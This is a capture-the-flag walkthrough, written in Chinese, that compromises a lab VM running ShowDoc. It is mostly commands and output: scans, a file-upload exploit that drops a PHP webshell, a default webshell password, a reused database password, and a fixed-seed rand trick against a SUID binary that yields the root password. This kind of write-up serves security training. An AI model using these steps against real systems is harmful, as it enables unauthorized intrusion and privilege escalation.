show

信息收集┌──(root㉿kali)-[~] └─# arp-scan -I eth0 -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:04:d2:0f, IPv4: 192.168.0.105 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.0.1 90:76:9f:0d:9f:8c SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 192.168.0.100 f0:20:ff:13:f9:a2 (Unknown) 192.168.0.101 08:00:27:53:6b:8a PCS Systemtechnik GmbH ​ 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.962 seconds (130.48 hosts/sec). 3 responded扫一下端口┌──(root㉿kali)-[~] └─# nmap -sC -sV 192.168.0.101 -n -vv -min-rate2000 -p- Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-28 15:59 CST NSE: Loaded 157 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 15:59 Completed NSE at 15:59, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 15:59 Completed NSE at 15:59, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 15:59 Completed NSE at 15:59, 0.00s elapsed Initiating ARP Ping Scan at 15:59 Scanning 192.168.0.101 [1 port] Completed ARP Ping Scan at 15:59, 0.03s elapsed (1 total hosts) Initiating SYN Stealth Scan at 15:59 Scanning 192.168.0.101 [65535 ports] Discovered open port 22/tcp on 192.168.0.101 Discovered open port 80/tcp on 192.168.0.101 Completed SYN Stealth Scan at 15:59, 8.10s elapsed (65535 total ports) Initiating Service scan at 15:59 Scanning 2 services on 192.168.0.101 Completed Service scan at 15:59, 6.16s elapsed (2 services on 1 host) NSE: Script scanning 192.168.0.101. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 15:59 Completed NSE at 15:59, 0.52s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 15:59 Completed NSE at 15:59, 0.01s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 15:59 Completed NSE at 15:59, 0.00s elapsed Nmap scan report for 192.168.0.101 Host is up, received arp-response (0.0024s latency). Scanned at 2026-04-28 15:59:31 CST for 15s Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 64 OpenSSH 10.0p2 Debian 7deb13u1 (protocol 2.0) 80/tcp open http syn-ack ttl 64 Apache httpd 2.4.66 ((Debian)) | http-title: ShowDoc |_Requested resource was ./web/#/ | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-favicon: Unknown favicon MD5: 1FBC02DC6F980F075779049BF687128A | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Apache/2.4.66 (Debian) MAC Address: 08:00:27:53:6B:8A (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ​ NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 15:59 Completed NSE at 15:59, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 15:59 Completed NSE at 15:59, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 15:59 Completed NSE at 15:59, 0.00s elapsed Read data files from: /usr/share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.13 seconds Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)访问80端口发现web页面是ShowDoc后用nuclei发现ShowDoc有一个任意文件上上传┌──(root㉿kali)-[~] └─# nuclei -u http://192.168.0.101 ​ __ _ ____ __ _______/ /__ (_) / __ \/ / / / ___/ / _ \/ / / / / / /_/ / /__/ / __/ / /_/ /_/\__,_/\___/_/\___/_/ v3.7.0 ​ projectdiscovery.io ​ [INF] Current nuclei version: v3.7.0 (outdated) [INF] Current nuclei-templates version: v10.4.2 (latest) [INF] New templates added in latest release: 121 [INF] Templates loaded for current scan: 10095 [INF] Executing 10079 signed templates from projectdiscovery/nuclei-templates [WRN] Loading 16 unsigned templates for scan. Use with caution. [INF] Targets loaded for current scan: 1 [INF] Templates clustered: 2281 (Reduced 2154 Requests) [CNVD-2020-26585] [http] [critical] http://192.168.0.101/Public//Uploads//2026-04-28//69f06b45a1834.txt [INF] Using Interactsh Server: oast.site [INF] Skipped 192.168.0.101:80 from target list as found unresponsive permanently: causeno address found for host chaingot err while executing https://login.microsoftonline.com:443/192.168.0.101/v2.0/.well-known/openid-configuration [cookies-without-secure] [javascript] [info] 192.168.0.101 [PHPSESSID] [cookies-without-httponly] [javascript] [info] 192.168.0.101 [PHPSESSID] [INF] Skipped 192.168.0.101:9780 from target list as found unresponsive permanently: causeport closed or filtered address192.168.0.101:9780 chainconnection refused; got err while executing http://192.168.0.101:9780/api/v1/user_assets/nfc [ssh-auth-methods] [javascript] [info] 192.168.0.101:22 [[publickey,password]] [ssh-password-auth] [javascript] [info] 192.168.0.101:22 [ssh-sha1-hmac-algo] [javascript] [info] 192.168.0.101:22 [ssh-server-enumeration] [javascript] [info] 192.168.0.101:22 [SSH-2.0-OpenSSH_10.0p2 Debian-7deb13u1] [INF] Skipped 192.168.0.101:5814 from target list as found unresponsive permanently: Get https://192.168.0.101:5814/autopass: causeport closed or filtered address192.168.0.101:5814 chainconnection refused [dockerfile-hidden-disclosure] [http] [medium] http://192.168.0.101/Dockerfile [robots-txt] [http] [info] http://192.168.0.101/robots.txt [missing-cookie-samesite-strict] [http] [info] http://192.168.0.101 [PHPSESSID7ndpunsj75b667kusqntfuu9ig; path/] [tech-detect:php] [http] [info] http://192.168.0.101 [readme-md] [http] [info] http://192.168.0.101/README.md [http-missing-security-headers:strict-transport-security] [http] [info] http://192.168.0.101/web/#/ [http-missing-security-headers:permissions-policy] [http] [info] http://192.168.0.101/web/#/ [http-missing-security-headers:x-frame-options] [http] [info] http://192.168.0.101/web/#/ [http-missing-security-headers:x-content-type-options] [http] [info] http://192.168.0.101/web/#/ [http-missing-security-headers:clear-site-data] [http] [info] http://192.168.0.101/web/#/ [http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://192.168.0.101/web/#/ [http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://192.168.0.101/web/#/ [http-missing-security-headers:missing-content-type] [http] [info] http://192.168.0.101/web/#/ [http-missing-security-headers:content-security-policy] [http] [info] http://192.168.0.101/web/#/ [http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://192.168.0.101/web/#/ [http-missing-security-headers:referrer-policy] [http] [info] http://192.168.0.101/web/#/ [http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://192.168.0.101/web/#/ [INF] Skipped 192.168.0.101:4040 from target list as found unresponsive permanently: causeport closed or filtered address192.168.0.101:4040 chainconnection refused; got err while executing https://192.168.0.101:4040/jobs/?\scriptalert(document.domain)/script [robots-txt-endpoint] [http] [info] http://192.168.0.101/robots.txt [showdoc-panel] [http] [info] http://192.168.0.101/web/#/user/login [INF] Scan completed in 1m. 26 matches found.┌──(root㉿kali)-[/tmp/showdoc_fileupload] └─# python3 showdoc_fileupload_exp.py -u http://192.168.0.101/ ​ ​ _ _ __ _ _ _ _ | | | | / _(_) | | | | | ___| |__ _____ ____| | ___ ___ | |_ _| | ___ _ _ _ __ | | ___ __ _ __| | / __| _ \ / _ \ \ /\ / / _ |/ _ \ / __| | _| | |/ _ \ | | | _ \| |/ _ \ / _ |/ _ | \__ \ | | | (_) \ V V / (_| | (_) | (__ | | | | | __/ |_| | |_) | | (_) | (_| | (_| | |___/_| |_|\___/ \_/\_/ \__,_|\___/ \___| |_| |_|_|\___|\__,_| .__/|_|\___/ \__,_|\__,_| ______ | | |______| |_| fileupload_exp by m2 ​ ​ []http://192.168.0.101 file upload success! webshell_path:http://192.168.0.101/Public/Uploads/2026-04-28/69f06eb92fef8.php 冰蝎3连接,默认password:m2orz 任务完成用时0s然后直接用冰蝎连接一下提权经过收索发现配置文件config.php发现了一个密码showdoc123456尝试登录mooil1qin9用户均成功了www-dataShow:~/html/server/Application/Common/Conf$ ls -al total 20 drwxr-xr-x 2 www-data www-data 4096 Jul 20 2020 . drwxr-xr-x 4 www-data www-data 4096 Jul 20 2020 .. -rw-r--r-- 1 www-data www-data 1903 Jul 20 2020 config.php -rw-r--r-- 1 www-data www-data 800 Jul 20 2020 debug.php -rw-r--r-- 1 www-data www-data 1 Jul 20 2020 index.html www-dataShow:~/html/server/Application/Common/Conf$ cat config.php ?php return array( //配置项配置值 //使用sqlite数据库 DB_TYPE Sqlite, DB_NAME ../Sqlite/showdoc.db.php, //showdoc不再支持mysql http://www.showdoc.cc/help?page_id31990 DB_HOST localhost, DB_USER showdoc, DB_PWD showdoc123456, DB_PORT 3306, // 端口 DB_PREFIX , // 数据库表前缀 DB_CHARSET utf8, // 字符集 DB_DEBUG TRUE, // 数据库调试模式 开启后可以记录SQL日志 URL_HTML_SUFFIX ,//url伪静态后缀 URL_MODEL 3 ,//URL兼容模式 URL_ROUTER_ON true, URL_ROUTE_RULESarray( :id\d Home/Item/show?item_id:1, :domain\s$ Home/Item/show?item_domain:1,//item的个性域名 uid/:id\d Home/Item/showByUid?uid:1, page/:id\d Home/Page/single?page_id:1, ), URL_CASE_INSENSITIVEtrue, SHOW_ERROR_MSG true, // 显示错误信息这样在部署模式下也能显示错误 STATS_CODE , //可选统计代码 TMPL_CACHE_ON false,//禁止模板编译缓存 HTML_CACHE_ON false,//禁止静态缓存 TMPL_EXCEPTION_FILE ../Public/exception.tpl , //错误模版 //上传文件到七牛的配置 UPLOAD_SITEIMG_QINIU array( maxSize 5 * 1024 * 1024,//文件大小 rootPath ./, saveName array (uniqid, ), driver Qiniu, driverConfig array ( secrectKey , accessKey , domain , bucket , ) ), );www-dataShow:~/html/server/Application/Common/Conf$ /Application/Common/Conf$ cat /etc/passwd | grep bash root:x:0:0:root:/root:/bin/bash mooi:x:1000:1000:,,,:/home/mooi:/bin/bash l1qin9:x:1001:1001:,,,:/home/l1qin9:/bin/bash www-dataShow:~/html/server/Application/Common/Conf$ su mooi Password: mooiShow:/var/www/html/server/Application/Common/Conf$ id uid1000(mooi) gid1000(mooi) groups1000(mooi),100(users) mooiShow:/var/www/html/server/Application/Common/Conf$ su l1qin9 Password: l1qin9Show:/var/www/html/server/Application/Common/Conf$ id uid1001(l1qin9) gid1001(l1qin9) groups1001(l1qin9),100(users) l1qin9Show:/var/www/html/server/Application/Common/Conf$最后在l1qin9用户目录下发现了一个auth_monitor脚本有s权限通过对它的分析发现它直接固定用0x539调用真正的srand。直接用payload生成 正确密码拿到root的密码了payloadpython3 -c import ctypes; libcctypes.CDLL(libc.so.6); libc.srand(0x539); print(libc.rand())l1qin9Show:~$ python3 -c import ctypes; libcctypes.CDLL(libc.so.6); libc.srand(0x539); print(libc.rand()) 292616681 l1qin9Show:~$ ls -al total 60 drwx------ 2 l1qin9 l1qin9 4096 Apr 27 12:27 . drwxr-xr-x 4 root root 4096 Apr 25 20:07 .. -rwsr-sr-x 1 root root 16632 Apr 25 22:43 auth_monitor lrwxrwxrwx 1 root root 9 Apr 25 22:47 .bash_history - /dev/null -rw-r--r-- 1 l1qin9 l1qin9 220 Apr 25 20:07 .bash_logout -rw-r--r-- 1 l1qin9 l1qin9 3526 Apr 25 20:07 .bashrc -rwxrwxr-x 1 l1qin9 l1qin9 16096 Apr 27 12:27 calc -rw-rw-r-- 1 l1qin9 l1qin9 410 Apr 27 12:26 calc.c -rw-r--r-- 1 l1qin9 l1qin9 807 Apr 25 20:07 .profile l1qin9Show:~$ ./auth_monitor --- MAZE-SEC ACCESS MONITOR --- SYSTEM_TICK: 1777367879 CHALLENGE_STAMP: b1427726 ENTER ACCESS CODE: 292616681 1NOjcN9b9uqUJ0VPYbgi l1qin9Show:~$ su root Password: rootShow:/home/l1qin9# id uid0(root) gid0(root) groups0(root) rootShow:/home/l1qin9#好了结束了